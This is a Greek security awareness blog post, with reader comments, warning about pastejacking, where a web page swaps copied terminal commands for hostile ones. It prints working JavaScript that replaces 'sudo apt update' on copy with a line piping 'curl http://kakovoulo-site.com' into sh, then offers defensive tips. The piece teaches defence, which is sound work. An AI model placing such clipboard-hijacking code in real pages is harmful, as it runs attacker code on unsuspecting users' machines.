Μια ασυνήθιστη επίδειξη hacking θα σας κάνει να σκεφτείτε δύο φορές πριν κάνετε οποιοδήποτε κείμενο αντιγραφή – επικόλληση.
Αυτός είναι ο λόγος που ΠΟΤΕ δεν πρέπει να αντιγράψετε εντολές επικόλλησης απευθείας στο τερματικό σας. Ρωτήστε οποιονδήποτε προγραμματιστή ή διαχειριστή εάν έχει αντιγράψει ποτέ μια γραμμή εντολών ή ένα απόσπασμα κώδικα από τον ιστό. Η απάντηση μάλλον θα ήταν ΝΑΙ. Θα υποθέτετε ότι αυτό που αντιγράψατε είναι αυτό που επικολλάτε, σωστά; Λοιπόν, όχι!
Νομίζετε ότι αντιγράφετε ένα πράγμα, αλλά αντικαθίσταται με κάτι άλλο, όπως κακόβουλο κώδικα. Το μόνο που χρειάζεται είναι μια ενιαία γραμμή κώδικα που εισάγεται στον κώδικα που αντιγράψατε για να δημιουργήσετε μια κερκόπορτα στην εφαρμογή σας.
Αυτή η επίθεση είναι πολύ απλή αλλά μπορεί να προκαλέσει μεγάλες ζημιές. Να δούμε πώς λειτουργεί στην πράξη:
Ευχαριστούμε τον Harel Friedlander για την εγγραφή αυτού του βίντεο.
Ας υποθέσουμε ότι ψάχνετε πώς να ενημερώσετε το ubuntu σας και βρήκατε την παρακάτω εντολή, Την αντιγράφετε. Δοκιμάστε το – αντιγράψτε και επικολλήστε την παρακάτω εντολή:
$ sudo apt update
Εδώ είναι το JavaScript που τρέχει το exploit.
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
);
e.preventDefault();
});
Πως να προστατευτώ;
Ο ασφαλέστερος τρόπος είναι να μην επικολλήσετε τίποτα από τον Ιστό στο τερματικό σας. Μια άλλη επιλογή είναι να προσθέσετε “#” πριν την επικόλληση, αυτό θα μετατρέψει την εντολή σε “σχόλιο” και δεν θα την εκτελέσει. Με αυτό τον τρόπο θα δείτε τι θα επικολλήσετε πριν το τρέξει το τερματικό σας. Μπορείτε φυσικά να επικολλήσετε την εντολή σε ένα txt αρχείο πριν την βάλετε στο terminal σας.
Επίσης πολλά τερματικά μπορούν να ρυθμιστούν ώστε να μην τρέχουν αυτόματα όταν επικολλάτε ένα “\n” (νέα γραμμή)
Το παραπάνω ήταν μόνο ένα παράδειγμα γιατί η ευαισθητοποίηση είναι απαραίτητη για την αποφυγή κάθε εισβολής. Υπάρχουν πολλά παραδείγματα πραγματικά κακόβουλα scripts που κυκλοφορούν στο διαδίκτυο.
Η άλλη εναλλακτική, βέβαια, είναι να χρησιμοποιήσεις έναν ενδιάμεσο προορισμό (π.χ. text editor), όπου θα φανεί τι πραγματικά έχεις μέσα στο clipboard σου.
Ένα ταπεινό ευχαριστώ!
Καλησπέρα, Χρόνια Πολλά και Καλή Χρονιά!!
Θα ήθελα να σε ευχαριστήσω κατ` αρχάς για τα ενημερωτικά άρθρα σου.
Μία λύση ακόμα η οποία λύνει το παραπάνω πρόβλημα, λειτουργεί σε firefox, about:config >> dom.event.clipboardevents.enabled >> false.
Ένας φίλος του πιο παραμετροποίησιμου browser στον κόσμο.
καλή χρονιά, σε ευχαριστούμε για την προσθήκη